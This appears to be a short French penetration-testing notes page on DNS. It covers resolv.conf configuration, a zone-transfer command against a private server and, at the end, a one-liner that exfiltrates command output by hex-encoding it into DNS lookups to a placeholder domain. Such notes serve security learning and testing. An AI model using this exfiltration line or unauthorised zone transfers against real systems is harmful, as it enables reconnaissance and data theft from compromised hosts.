title | permalink |
---|---|
DNS |
/DNS/ |
Sous Linux, le serveur DNS utilisé se configure en modifiant le fichier /etc/resolv.conf.
Il est possible de récupérer des informations en effetuant un DNS Zone Transfer. Ici on effectue un transfert de zone du domaine thinc.local sur le serveur DNS 192.168.31.221:
dig -t axfr @192.168.31.221 thinc.local
https://blog.bugcrowd.com/discovering-subdomains
On peut utiliser DNS pour exfiltrer des réponses si on a un shell sans retour et aucune possibilité d'avoir un retour direct (nc, http request, etc.)
id | xxd -p > /tmp/exfiltration; for line in $(cat /tmp/exfiltration); do dig $line.domain.com; done